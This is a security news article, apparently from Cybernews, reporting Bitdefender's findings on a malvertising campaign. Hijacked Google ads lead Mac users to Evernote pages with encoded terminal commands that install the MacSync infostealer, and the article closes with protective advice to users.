Hackers have hijacked at least 35 Google Advertiser accounts, launching more than 200 malicious ads targeting Mac users seeking 7-Zip, Notepad++, LibreOffice, Final Cut Pro, and other popular software. A click on the top search result might lead to a malware infection, Bitdefender warns.
The security firm has discovered a new malvertising campaign that infects Mac users with a powerful infostealer, capable of collecting crypto wallet information, account credentials, browser sessions, and exfiltrating files and documents from the system.
When users search for a specific piece of software on Google, carefully targeted malicious sponsored search results appear at the top.
“Mac users searching for popular software like 7-Zip, Notepad++, LibreOffice, and Final Cut Pro may unknowingly land in the middle of an active malvertising campaign,” Bitdefender Labs warned in a report.
The campaign is powered by hijacked Google Advertiser accounts that were previously promoting entirely unrelated services, such as charities, law firms, commercial businesses, travel agencies, hotels, and other legitimate industries.
The 35 identified accounts are widely distributed geographically and originate from at least 15 countries, including the US, Canada, Italy, Poland, Brazil, Germany, India, China, the United Arab Emirates, and others.
Bitdefender observed over 200 paid ads impersonating legitimate macOS software: 7-Zip, Notepad++, The Unarchiver, Homebrew, LibreOffice, Microsoft Office, OBS Studio, Final Cut Pro, PopClip, AppCleaner, Rectangle, PearCleaner, and others.
“The ads are carefully configured to trigger on searches for these exact products. Anyone looking for a legitimate download may unknowingly click a malicious sponsored result instead,” the report reads.
For landing pages, attackers abuse Evernote pages, a legitimate infrastructure for posting notes, making it harder to automatically detect the malicious intent.
There are no malicious packages on the landing pages – hackers instruct users to open the terminal and paste a command to install the software.
“The ads redirect users to shared Evernote notes. All notes are hosted under the same Evernote account and contain nearly identical content,” the researchers at Bitdefender said.
The pages mimic tutorial-style installation guides. The provided terminal instructions are encoded in Base64 to mask malicious content, while other product descriptions appear legitimate. Hackers lure users with high compression ratios or advanced features.
This method of social engineering, tricking users to run the malware themselves, bypassing security measures, is known as ClickFix.
Powerful malware steals data, crypto
In this campaign, the attackers deliver MacSync as a payload. The malware evolved beyond previously documented variants.
This refined infostealer has many capabilities, including exfiltrating files and documents, displaying fake macOS password prompts to harvest credentials, stealing browser data, including cookies, logins, and extensions.
The malware also collects data from Telegram and macOS Notes and exfiltrates crypto-wallet information. MacSync establishes persistence by replacing legitimate crypto-wallet applications, such as Ledger Live or Trezor.
Bitdefender warns users that the malicious campaign isn’t limited to Mac. It is part of a broader, coordinated ecosystem targeting users across Google and Meta Ads in Windows and macOS environments. Small businesses appear to be a prime target, feeding the campaign with additional advertising accounts to run the scam at scale.
“The same threat actor (or tightly linked group) may be running parallel campaigns across advertising platforms, adapting lures while reusing backend infrastructure,” the report concludes.
Researchers recommend using security tools, scrolling past sponsored results, never clicking suspicious links, or running unknown Terminal commands – legitimate software is never distributed in encoded scripts.
Unlock exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked